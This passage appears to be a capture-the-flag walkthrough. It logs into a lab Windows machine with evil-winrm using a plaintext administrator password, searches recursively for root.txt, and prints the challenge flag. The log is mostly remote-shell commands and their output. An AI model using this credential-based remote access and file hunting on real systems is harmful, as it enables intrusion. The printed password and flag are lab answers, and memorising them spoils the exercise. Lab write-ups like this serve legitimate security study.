└─$ evil-winrm -S -i 10.10.11.152 -u administrator -p 'I5wQ0fGrS}M;}xe+6KtQ5b3]'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ../
*Evil-WinRM* PS C:\Users\Administrator> ls


    Directory: C:\Users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---       10/23/2021  11:27 AM                3D Objects
d-r---       10/23/2021  11:27 AM                Contacts
d-r---         3/3/2022   7:48 PM                Desktop
d-r---       10/23/2021  12:22 PM                Documents
d-r---       10/25/2021   2:06 PM                Downloads
d-r---       10/23/2021  11:27 AM                Favorites
d-r---       10/23/2021  11:28 AM                Links
d-r---       10/23/2021  11:27 AM                Music
d-r---       10/23/2021  11:27 AM                Pictures
d-r---       10/23/2021  11:27 AM                Saved Games
d-r---       10/23/2021  11:27 AM                Searches
d-r---       10/23/2021  11:27 AM                Videos


*Evil-WinRM* PS C:\Users\Administrator> ls -Recurse | ? { $_.Name -eq 'root.txt' }
*Evil-WinRM* PS C:\Users\Administrator> 

Recursively search for the file from c:/ — C:> ls -Recurse | ? { $_.Name -eq ‘root.txt’ }

*Evil-WinRM* PS C:\Users\Administrator> 
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ../
*Evil-WinRM* PS C:\Users\Administrator> cd ../
*Evil-WinRM* PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/23/2021  11:27 AM                Administrator
d-----       10/25/2021   8:22 AM                legacyy
d-r---       10/23/2021  11:27 AM                Public
d-----       10/25/2021  12:23 PM                svc_deploy
d-----        2/23/2022   5:45 PM                TRX


*Evil-WinRM* PS C:\Users> cd ../
*Evil-WinRM* PS C:\> ls -Recurse | ? { $_.Name -eq 'root.txt' }



    Directory: C:\Users\TRX\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/15/2023   6:06 AM             34 root.txt
^C

                                        
Warning: Press "y" to exit, press any other key to continue
*Evil-WinRM* PS C:\> cd C:\Users\TRX\Desktop
*Evil-WinRM* PS C:\Users\TRX\Desktop> cat root.txt
51133447a29f21056ee6ded62a00f9d5
*Evil-WinRM* PS C:\Users\TRX\Desktop> 

We get the flag – 51133447a29f21056ee6ded62a00f9d5